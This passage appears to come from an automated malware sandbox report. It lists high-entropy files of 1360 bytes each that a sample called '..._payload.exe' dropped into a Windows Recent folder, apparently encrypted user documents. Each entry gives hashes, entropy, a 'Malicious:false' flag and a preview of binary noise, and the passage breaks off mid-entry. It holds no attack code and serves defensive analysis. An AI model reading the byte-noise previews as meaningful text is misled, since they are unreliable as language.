                                                                                                                                                                      SHA1:7A89F1326CA4A7591D7651E4366E508E75350C9B
                                                                                                                                                                      SHA-256:A285159B9C78E00D7B92B01FC1D7FBCD55947477216DB5692EDB60A995C2F28C
                                                                                                                                                                      SHA-512:21D3BEFEBFC3063106D96940E3491BD4ABB7FAAA840A92E6187E0B1C1782EC1EDAC7E2ABCDE7CA74506B2CB99D432B26B84145E8F04DB2FC9F86CA7F54665BAD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IPKGE..r.h......^...3...H.......j..R..:?*%.=..../..A..g..i..n.pD.#..+.(8.....-..U..1..;~....E.w...sG.^r...cQ4..5.2.,<o...L....y`....a..g...F.q._.-i]..C.....'.+....aB.y........`.3.4Q.fy=...:....h.a.m...-o.l...8>e..T....v...T.......^....1P......_.^.>R.v`..Q.M...X.M..IK.. w.?..%J.y.lY.f .................Z.e...#.^.;o=...a.0..%.~%..{Bv.don..;.&.....).z.`.-+%x...y..^...s...W...s.mp..}.E...k..WR.....iA...UnD..]O..m....C]y<*w.V.8..}&?......S.y..v#s.....V.*...6b...Z...V...Gx.b...j.-7.4.G.3|j.ao.......r.i.o...'..;W.....]....[...J..D..4.]A.T.p.s......f.....J,..h.8h^..p9[.U#/.X..0..t....E~.5......L........P.jT..3.....d..S......j].|.D........R.'...~s...Y>.f&T..o.".....jq.&.9.=a.....\...)i.(`@.....@........y..~z..{.G9... .@..ak..^..P....)..&..R.......`.t}Y..rax..[^(v.?.!f.........s..T.u.I ...dj.....Y.......W."w...<s%.W#..../.u..<...].%.C...b.6<...>.Q.3..C.L7.[...;I.]S..;._|.b.|..n..n#............F....H...X...r.L.U-bJ.d.....O..<....9.5E]..'#......

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KATAXZVCPS.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8548497522179135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3aaJYJXsNNTw4HYlBiDa/swjlLMP9qEkYMqyVsEG3VIwHluLoCyXPEk9GOUKFjKu:3agYJXwWJ3s8l29qENwI2HMxbGGFeHWD
                                                                                                                                                                      MD5:5FFDDA2BD41E3C0E67A12757F13642B0
                                                                                                                                                                      SHA1:0E873C6EB7338D5941191E54116C965E493C95AB
                                                                                                                                                                      SHA-256:4701216BBC1B23400CF5B549311F0193E9D4B46BDDAE43239F1F91C4AEB3CAE0
                                                                                                                                                                      SHA-512:9BC0A9468D3A11702FFDCE6B55528FC1334E86B9BF145209E51710BC5A1356A3B6B58EEE83E7563B6EE60AC799B13D645E6AE7DEC85CF216107830D0B4EE7BFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX...go.7E".........>..,............:....|.3L/.B...X..UN...+.F...+..Q.......rY. .t..z...A...w..l....1C........._hh.A..Z...6............hL.).]7....x.....Z.m.%..?m..../..c].xo.....Mi.........dS...]P...9....J....9..c....AR!.!...w....`......Q..@)...G.-..e..6....X....|&2'.A..kZ.h..~.. ......Q.o.g.....b...)._..B-T.[\.y.....%b.G.].h..k._*3T.r....p.1.4.[......[.{L.|.q.6 .....^.....5.H.aw..r4.-.pF.....%../.!..z...,.vs%a.....N.n"Yq..";..l.{.P.]sB_.4.j.>%H*%.......H#...`XC(2k.*.>(..../..`3].F,N....D.$}.qu..:on.....R.T.L7.{.h<...y.O..Cl"XD@E...*T.3..x.d..+....l.w......@1....zoY..O.....^W...u!..S..p......V...'u.dn.z.9..{O.n3FoFs....W.p .....BY......V..e...T..+....x.yd.O...4...9.b..JP...7....L.7e...q.c..0'.}..t.....}!...,....=.......i.W...8 ...m..K"H...Pk...:.xY.k-....[<......k......i....L?.F.....|.).aa.$...(..k.r.{.9.>*.FM..-2.T.X.cEu.h..7...nA.w.......H1......H.Qz>.a{&Q...ou{4.VB.....@.?....%..K.a...>...Q..t.v..:..`p.....%. ..u.\......K.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KKCTUQOTUB.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.867130928739586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Txc6cDEwQjwLzd1v8lSq/DcxolKXaLZdzIangeZdg0l/y2bD:FQE/wLzd5mcq2aLZdzIage80/D
                                                                                                                                                                      MD5:8865B5E408C3C789B36A7D9CE21D05FC
                                                                                                                                                                      SHA1:C91C48830449ACDD1227A42CD0A67D7373577109
                                                                                                                                                                      SHA-256:255CAA442E7C9068D1155DF58C75FBA6DC78B499AFE18E7D6C848DBAEE0EBF77
                                                                                                                                                                      SHA-512:8964138226663E3A376D2E04B08E88BC881E9226C156980F8E88F7022D199D8FBE08DE659A8B0EAFA5E689F4007E8157CF8418E9C8C5077DA5EDCDBB225D8DDE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KKCTU.Ex$?.@..k... .F..d%{@....#.YN....q`.]....j.....Y-..d..,R.!f.2j`3v.,.. .......61UE..N......F4.&r9|..../7..l.>.v....>g..&x...?`k..t..z..n.O....&Y...&v..3ZfM!....s.M...OE..".M)n...!.. ....c~.............Gy5...*.........,A|\.~..i.bK`...UP.6.q......*},Lk.,..........3]=...k.On.T.S[[..J.?1..m.-....y.1VG..V.X.y......5r .:n_...;.CD}.Q...j)F0jB....H .3..r.R....P.._."..s.F..1..>..f.Y.).....rb.a......4........(.VK...;F.c.px=h....u_L..Ev.z-[...2...;a7A..v......)7......E..H.p..n#+V...9.p............0/.@=.-.+..r..(.'.B.......%[p.9i....b[C^.W7j....?..a...f....%.A^..AV..?.....Bn.t....b...zK0J.......;o..?....Z`.....<...b.7.[v....K....r.-......h..c....gS.&..&l....l..J.c.3...+..)Q|H.Q.K,.lH.f.5A.h1..!z..........(.^...b......0.....\az..-...L..+.z....#B..q.....U.!..!..q.3...........Z...!.5...`...6Y.2..n..f&\4..>...r...n..5....$KQ..qUD.H.'...I.p.x.%.v..j...nW,.iLc...m?..(f...6o...b../..V..`i..I_ML5].q...L...u..5...3.^;......yw...W.F.c.XWq...TT

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843847884081807
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ZRBc45M48vFd6IbsGYIWIjNYnIWnXET7gRPqefLu+olKnMD8Sb6PpCh2bD:Z4QHgF4Iwl3IKnGMRPvjurlKnMDrsRD
                                                                                                                                                                      MD5:6ACDFAAA4041B469A38998CCF55E3A63
                                                                                                                                                                      SHA1:1FFCE6B3D9917B7D8D9A080B2A9623EB1FBAAC4A
                                                                                                                                                                      SHA-256:7EF09362FFD83CBD9992018299DED4826D300186123EEAD7E6F1F7379B4D150E
                                                                                                                                                                      SHA-512:9501AFAF77C4A07224E2150DB6F3CAE9AE024B7E0141F84FC7C63AF975EFF61563646D78C9F982A1388F8B6A34978CCD265EB3E9AC9F317F805EF32D8F91732C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.k.y...o.{r-5..G.J{.x...Lw/.>.,i..O.L...rD.1.)....Ug...,W.4&..|].7.P\..Bzi.]b.....v%..p.bB.9..QB..wI..>..S>X1t....Y....Gb..l.O..e...N./...T..h....dUj...@....!.`.I....1.)..#..P.!}.p2..9w...s)..K..(5.@.....9.|...;w.&...0....O...~...?........X=.v./J2...L.$..7.Q.g.....5.....^&H......'.F....6]E...|..c.E30N.<3.z...O{<......~.J.K...g..c.d.ym.....{.a..S.9u.T...oM9 [...pO.J@..g.W........^nx.'........:\"`z.`..2.|i......\Gw...U+)-Hs..F..6};A......'...:.xMT..z..6.%..Y&....p..}.gT.e.I......U..xqR..*,......9...;...V..,... . |....E../..T&`.........#..a......rA;.....I.?....+.z..qD.#..+...i....3[,@Ez.....M.*........Vg...!.5....._(&@.g..'D....(.C..Yd=.VX.[r..Aa%...|....).5....A..'..u[.8..l.....<w.8.F..?..G.Q.GYd.o.5T.....cV........&....[7..?H...o....S0W9...W..r....G\...R~.e...r..... UaN...\.>B..y...iy.0..2.....~c....#m......rfw..l.~Q......q2#+u"....u.B....OI....i.qh.KN...iX.&.&..B...]$.....J.n..#.....0... !.4..R"tI6c^...%.lry..2.J...X.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852757006082319
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:p0mSm6Ss18tqyDXfN9xs/qE2QUvUpMUWprrvfxq9RI/3wHnUiJQA2bD:pTSg48tqyD/xs/qE2TUpv2rrnc7Y2iD
                                                                                                                                                                      MD5:DEA071C611563AE2CD4167E46D5D85DB
                                                                                                                                                                      SHA1:D3590A4DCA4C64C528A16B3A20B02C799DBC3266
                                                                                                                                                                      SHA-256:E78103C7447AD49755EBB5688112A90E87B75C38452CCB4D3F3D61B19E64DADD
                                                                                                                                                                      SHA-512:B502466E3219C9D5B2F0A9ADCB19E48055BDA6F508576A2008CBB55C7243723FCA241B7EDAA183A35597F5B112372C9E708AF31C8F687FBE821A734897924A47
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN..*q.@.wE...%.. ....^[~fY...VTQ.....]..iuZwo...m.....d..@p..@-......~....k.....B......b.A.B..{.=..(.t4#.c#M.V/\g.....|......,.V.....;un..dO..5...K....[*....D..&o..FG;..B)T.XC2{s.ZNm%.[......MsVS..Z...c.},Fw6...!..WgY....c.i.......qbv....U.l.2.A...N.......yq.+r..w.f.q.1.;....R.q.UE|,.c#..9..`(.DE.........2y.,.T+.....5...{......Bh/.....W...x..]....$....\.Wg].]%.1..|....Y...+...9.;.*........VMd.gF.6.$tK...ed0...n]..:J.'GM.c.va...j.?.....:.[d...sX7.s.+..B.L4..b.f..O;.TE.E<:.4..U./$1..h.......+8......Xn.m.{.I..x.R.3rT..1......5.=t...e...`..<.F.$....a.S...k1i..U..V{...a,....g.}..o.P>...a......."......P&.9.^.rNc....9..8.:T|.b,..^.J_...z..E..#.6..i.(....J,._.v....J..*'_..s.;.......S.N....ciI.....C..#l....m....7-.Fa....e1.k..p.O.....(.h./|...W..L.c...X.....#..`....w.:.*.;.Y.*S/.Eq.(..`..+..O#...PzLn8o...Bb...i.......7...Vx.M.f@@.....%hL.F..,..Z.1H.....J'.{..cV....>;m..=.....7..@...&iD.ZD7C..i.n......B...8S.........m..1dC..uW...L{...5..=S,4.).

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85194352602126
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:JZKKqG0SweJIZVbr65oS+a9YYKFCNbxwIgcojP5sCpuUN4WJ22bD:rqjiH+a9nkAT+P5sCpuUN4CD
                                                                                                                                                                      MD5:EF48D49818275E639E44549E2126B743
                                                                                                                                                                      SHA1:2A08411DEB1F73B55EE17C1BAA7AB34E87A85171
                                                                                                                                                                      SHA-256:D84B2C3A2A09A301902F5D41D4F43BEC9FE8E41444BFEE1859E27E17DB0A2051
                                                                                                                                                                      SHA-512:17647358C42A3D73442D3D3680DAC99953ECC9619DB3C912D22AED743A063639000ACC26EE6B3378B6E377A2B628D34408817E26AD72A7E6C26AB114091F4DB8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN..\....(....S..._.....m..#x{.&.G...zz..f...Y~..ubz....C.....tq|0.o.r..J.6.V...O.".;..&x+...x:.)..;..Y.:....#...Q.....?R......Z...N%...].m.5}/F.......e...k...b.......7..dr...!LX.S....@.%...|....i$+Y.a#..[....3..0..,/..\A4.~.wq../._.r..^UgL9.s...5. 73l...._.B.v|.uo^........$LW....,.5.s...c..2v..3.7p..m.....T...............6..-..i5./S..\.p.6.]O....w..C..K_..K......1.~-8#....q`..@..nuC...vk|..6.?+B.Y[.]..Z.Q......|.I*?>..7!@\..A..;.....t.+{......c.X..^..cgr."..y%.R..}...>l!...~...z7I..Q.*...Wq4?X...:....;._}..P..y.?.#).....}?.....x#.......$."[..(C..F..f.`..o..Nxt.1......f.T..(]...I...F?.......C.....'.,.....d.8.$.l...[..l.$y......B[...q........|h.?..sC$.I......~.j.....P..t.P.`'.....k..l.x..g.#.`<..\...'n......%~G......eK.^.S..A.Z.Dox.)g.Dc..j.......d.=.O.C...)..Iq..N.Y...m.#.6^.!....;.@..U....'G.,...JC.F[....f_k[..F/_. ..E.....j.l.....U.^.8%..M.-...2E.Xz.....~.....D...,.vm,...[..W.R.5..C..Z........x.....z......K......HH].#.*^hy.fr...:^@

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LTKMYBSEYZ.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.827434195974106
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kX9t3ZwaE+pow3d+YMkqWnpYdAOxxslzRSiBrsF3CLWtlbvNn7eQ7PJR2bD:k73ZMpYMk5pIzxslzRS/SE5NqaJqD
                                                                                                                                                                      MD5:F323E5B7BA97BBEE0D1D7BEA3F8722E3
                                                                                                                                                                      SHA1:2DB90527A52E2EDEB7D09415FCC22598FF649CFB
                                                                                                                                                                      SHA-256:C2F56F57A884CBCC254ABA1F6681D8C3F0F81623E3B25AA4263A77BDEBE8EF94
                                                                                                                                                                      SHA-512:7EE376CF02B23E4C53F8067BF9DB96C16939A02833C3CC525E6E413B19356D36F28414DE5A7055DF06C1F8610374DF0CD87049B9434FBFE29BB4BC80AC2DE314
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY$.l..!...3a..Ic3..H.5...fU!.y..v...}7l.gd.b..I.....1...K7.E....4.F|,.$C.C..8?..7.Q........%..JVI$....@b...&-.....+~..+......&.( ...n .o .l..C...x..=.:......!.5....J#u..\.......#.....-1."..d.W2....n.X.k.K....M2.....y....5.....wf ..9U.v..{M..Ln.}.$tO ."...(.G...Tg..14..SB.f.Y....#.../k../..j.0K..=.c..Y...*...iX.k.......:.1mN...n.....V.....o.g..*.G..Wwo.6.Ay..Qe........8I...$.]X../+..p..1..i............S%Rq....-'c.(f..=....;,.w.A.W*...3..L@ \...E.w!...}7...CQ...P.n.e....%...... ./.Y.....M.U.L...?..N...J.io..p.02.....L..4.......!.?sp.....A.+.L.....g..x..e4..h|....w..e.M.a.S..F..@`....e....XCk.c./E.C...]....H.~.)8{ok...=.mt.Q.:.>.)...I\..|.>.....s\Q.m......M%....^..D9DB..]p...&..1b.........6..*..l.-*!...Y.F.]I.@.s`.#J...`Sq.Cw..[[y.!-...Gfe.y7....d.....Ds...!,.1c.8U%..^C..x5}_.!.-.r.3..L...1..{...(.s7]-........S.)dO....d..;..3.+r...}.Yz.....D..\=E]....!..R..}..F..t....G(..+.{._...;H..7*t.......1,...\..I|PO......?#>../z6p.S^..a.....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LTKMYBSEYZ.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859001799386856
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zhuga0W/dCKH1P0+u+qehEhsMTdrb8Lknn5V+EPO9XtWaoetV2bD:Nuga0VKH1Vv6S+J8Lk5V+TLWzeID
                                                                                                                                                                      MD5:A65D920A6B07295D5415D507A81AA89E
                                                                                                                                                                      SHA1:7FFDB3A3C9BD29C52896FB0158249E09EEF8D69D
                                                                                                                                                                      SHA-256:A30228407EDC90B91EA73153C8864281F6D7B9463C80B3918EDC4F208F4C7B21
                                                                                                                                                                      SHA-512:D86D92756A3DC738825A727F99C79E796FF317E0E003FC62244D28B120AD03919F2D3BE9FA78BE77D112458F385C1BDBD962AE4B6EC9F888321FDC8D85F8E254
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY...R.>.Nw..".V...%}3.......^.......x..-b...W../Ss.7..PHo..q|4t..(?;w..%t.H...,B&.^..0...?...,..Gq7q..6K...B.....t.P.p..'.T4....W.....W.:"..........s.].n...Z.mqy..K~.8.G;.[K..'..W..8@...x(S...&[.G...<..}ig....sh%./1.<.h.~)..G$.....}..ZI-X..z...$.Y.%.z.C.=!>....'.....P.HZ.H...x.0ZO..@..M..._b...._....f..;..,.C..5..d.......E..fc.U.:y..}b9....4....>\.4..m....._.6.y...z:..R.m....^...&uw....:..),.. .qDK....f.&..j.........d..)...Y..m....I;.-*6....gH}..dHX."j.x..... ...)n..Z....Y.)ygr.e9&...B.......~y]......8H....R.mV.dJ\.W.|[.....[B.BW.!.d.C.V..a..v..m..(.......t.c..8.....A..B..w....-.qMu:.=]...:....2...L...-.;.,..n...Z..u...#~ 3..z....e...9i...e..........p...$..!)...[U.X._...&...tHD...Z.....E.4.^........./g..bK..<l..c..OS.."Uh.I..VQ..B/f?.. 0..W@..5G%0.B..B..._G....l.c...<...S..wzS.^..3E,.^...T.......(...D.lL\...!l..i....wSd.X.x.i.*.B<.c.#..v..?X.x....p.(}."....Y}f.(..R~}.2...z.....^k.0...f8V=u,d.gQ4..."..K.|.x....#......q.N....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MVLAMAIDGQ.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.809466468019772
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cT950qT26Ql8Hs1SvjPs+BTo9npGga5xoLjFZ4s9sjjLXPWI1ks7j7UmQY3dVtYq:cT9NT2NBujPs+BTOprn/b9OjmuXQWdV9
                                                                                                                                                                      MD5:B16E3818B90019DC4E343CE45EBF868B
                                                                                                                                                                      SHA1:62A0A0E9E759E8389D8039068AC52D314248F1EE
                                                                                                                                                                      SHA-256:7BF5B775B234189077ACC100420BD82B1666F31D8DC7F39C76C0A565B46D17D2
                                                                                                                                                                      SHA-512:AD94BFE44241B2B685B1779EC1F14F3E6CA44EF95EFAB055E4048EC967B3A0B1E6F71F628EED1EBFA9402969D9A120CEB763F4397A067D31132022FD573A55CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MVLAMB>....&w.A........8I.O....\_.L.r..lk.;p..\e......:...x.N.{I...?.1*....!.`sZ..ko..c......H..W....k....mV..o..ni..N..!.....I.........X<o.o......Gg..M.4B....|.<..P.U....i...X...|.-F.E...i.Zx...YE#_..9.:....2.c.A..8|..HF..'Hv.....g._.....cd......:..Q.&.#.(.1..4i.....E.l.F${....Y9.a.X......U..w........!..P.p/D..|.[t}..<B.p.....g....V...y..a.u..y.p...a.1V.?..z$.Z.I.dMR.B...4}N...l.5H.Q.3..^......).`.....m._[dK.7.........,Hs...;..#kVH{...u..".d...9./...7..-...(......q0....~..1i..!.......Gh.e....P...N..... .T.....I!.t...]...Y.?Rx.."...~p.k.2......k.HZvc..7HU.E.t.</.`|Y...#..9....:&.[..>.P.I..p/.8d.F.Y..0.$..I.qg.1H..-.d..!.An$H.....Q...I[..eV...v..3...8..-^.:N....l..P._....bl............Ize.k..........4..1k|.....u.......j4..../1.GV0/8.^.P...,...5h....S.O.0.E.3..5....X>.Nl....'..v*O...cU...O..m....oEie.......[.kd.q&xm.L....p..U..vc....$..l.C.Vq.F....[....1....6.v*2.,Z?,.j.....r;w~.2:..Q.URyL..{w".l/.ar..N>..YsGq.....p.a..N&.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIKHQAIQAU.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858425826062463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:vwT7XDTV7NOF6/QZkDe9m9lvZuXZKchCSBUUXfulpZyJWQSYU2bD:vEzh7NOA1Im9lvZuJT7BBul+JWQtnD
                                                                                                                                                                      MD5:90E9645D7BF3D744CF654B1F622E6CA0
                                                                                                                                                                      SHA1:F62FCB1AA63627C9426E77FCB285E2AB14CF5FED
                                                                                                                                                                      SHA-256:6FB149A6F03DB901AB4EF8E0C97A19B775BD45C670F7D2B17A2B40FC81A94A6B
                                                                                                                                                                      SHA-512:95BD9B42D2162FD4100CD08D8F776C9FCA8E123E9C4871D67A4AE0B4C6FAC4E05DFC2CA855D3F548BE209A0564258ADE0D3EAD576EF94667903122820AEA1282
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ..X.<W\....4..X...4..t...L.{a.r/.m.[....wN..q..r..Q..u.O....iJC+...F..Zb.......L.S.V..l....!...../...p.@...7!.`.....Lqf...C.f2D....HO....#~...-.K..yG.*#./.U=.....o%........~A..G..0..\<T99R..k!Ft\8.w.w.E......CI...l..&....g...o...[9.i."M..........T.'J.hh...Z.2qJ..(F@&..q....i:.......a...,x(...k...Z..ty.I@.bO..%.g......I]uK\.c7t7..._X....N.M...huvi.w]8p..7.]....... 3.0..y/3xF...I.K..S.Y..w... I.n_..u.Y.".G.1...Q.G......h......4!..#.~..<..a...T...b.HjS..o...:..<..N....F.>..5.3....n..q.G.FMR.G.3q.|.C.E...H6..5G.j........;...M.....$..j.,......8n.P....U.OW..F..t...hY...`...I12G...+.is..:..D]............Hc.P 1R;... .4.....Z.F..I5.......2.-L.Q#Z.)...t..}-.......[.54..YUq,..bJW.....0...#.j.ue..(...Z....>.....x.+^..@.V........t.R\]L.......O.C1V..v....3..x....p....]..;d.g.A.7..qH.u..5.?v.3...+.d.....D.........L_3...o~..k^....l[.:..'..WM.$.G".96.l9...?J....N|..........W....E.M..,.x]...uQ^...J.i..=R...=..{<...Ns..xDq.5...B.$ ......+..JA...\.A..d....1..8kk

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853626206034404
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SAh8ll3wNd0U5jqa5KzMA6pYbvV7/4c05cEg5b+sPHz2bD:SASlhw0AjqEA566bvlwzg5aEAD
                                                                                                                                                                      MD5:613147FD3C05292CA4CDF8119C9B5B15
                                                                                                                                                                      SHA1:DDE745FD4D7B2577468A15DD5728163B58352EAB
                                                                                                                                                                      SHA-256:33594A0EDB00153B3074A972FEE02C69575F8EC36A683BBE67DF031BE6BEB0B7
                                                                                                                                                                      SHA-512:79DF97EC53EE1E6BF5F6726CB0DB0D9FE0AF39F4853552483BA2CAE2136F5F674E2CFDE1A870C959F8143849BF56D53FCC7D2931450F978154CB98B49512494C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NWTVC...^T.:.2.....|#:.B.[xb..$.B....II........\qdT. ..%E3}.."fT.....ix..RF(.s..^..j'.&.&y5p.b1.d..C..rA>q..H..`]S....z{.....c..w.oZ...p&.r...=+...\..0K..:[.$>..[5.u......e..{aW..ndb5.G..^..oh..............d...^'.q......J......A8....}_.y...H..w9.?%..J.....[w...O...M..P..2...!$.K.,N..4..d.<_M.'7..............w...js*|o...s..i..-y....`...._..Z].A.N..>..>...<. . l+,..KY......&:.)...n....!..m..Gv...kd-..r.nv.]...!L.7..h0..r.U.......Ip.L.E.Us3=......$.....l...Uv.....j<........Y.I.%p..mrT.L^'...#..yg..G ..4wY..k#..z....;h0.._...>"...:...vl5y............Ue...v+%.Hr.wg..m.b'.l...G..]r8....0.. ...(...,.R..9..Y.W.....*.Xh........2..B..DE.6IC......}.....+... .b.. .........?\..42.>.v.=....(..S.....8k}.+Y....%.R.p...WX....^.jm.=..%.,..b_U.|E]...N......-.).Z.{,^q.ATXu.....M..r.*......S.K..1.w..H.\....s&..i.M.B.i.....z..R.]..f..^..._...c..4...7J)...._.SBJn.....\qf..#t.O....R..VHW.#.4.6Gv..........%e......q...6..zX....`;gf.%N.F..._,Z..S......S...m,

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86580383825765
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Dn4uYmBa8OczfkVsUqdwg2nJqAH10kAKBks6X02xKENyPNURTW5GU+CAU2gGH5iE:A2ZOczfkVsUqdwjJqgbBkd021NyVURTb
                                                                                                                                                                      MD5:62CF8486AD0D928B646614458A0678FC
                                                                                                                                                                      SHA1:AE81425A071A2C3D6300A6E146892D2604C01C6B
                                                                                                                                                                      SHA-256:C74445EBA43819C59BC405DA99EE62998E8D5B38670494B1E944A238E430F35B
                                                                                                                                                                      SHA-512:10AB94D7B52BFAF0A3D2636EED9BE80B60D54187861CB41411023012076E91ED80FCB381B2946034CDB0A7A6346574226DCC7329144F46D1BEA0749017F14174
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NWTVCS.`.\....kr......'..G<..".I.j.!...|..H.....~.+...A..Z...Mv..R...3...a..2...R!wBQ6.......]..Y7=.... ...y82P..t|.2w.]@.).W.. u6m5...b..I....y..]B../.l..$......&..a...c.....-S....9('a..~%.njp..S...;x....._.g....R.mP.n.k.H.f....^..!\b....^l7.e ..fS....ZZ.x*O.y....o.0.....l.....d....m..Q$....GB.-!4"|....~,...4y..?..g.fl ^(.I..3.p..3F.6.F..B.Q..&%0q..`....J.@......J.X...PA.\.R,.....:..Gu9a."Y.Q.6.S.+....|.......S_....<{..x~...4...=.*&%..`q..r.W...".6.<.;.......G....d;?.^...@h'.$.lg..'..4....>./..\..K.r%.t3.Ka..D.{QF..i..~..=7u...z@`..z..v....^;.2W."mQ.6.~..O....8.... .....<.;...@._.,<.nH...t......b..?..-..b.2.}M..5PI.W.;-^(..?.ZFRX..NY+......Ry.+l..........P...c]XQ.2......u.....=.Z4....S.\.u..s...-...K..8..Q.c...).|.. ...lj..B..f5pb..Y8...;...^qj+._.......W...@(WPZ..U.%..A....od.V.`".>...&J2Jy.....E.y..H.*926....NU...0..U.=.R."...L.3..k..zr@.=]..y.(..i.8voK....":.o....."......6...@Tz.....B....$5...........0...G..u...../..d...3#`./k."...W.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.863132706843393
                                                                                                                                                                      Encrypted:false
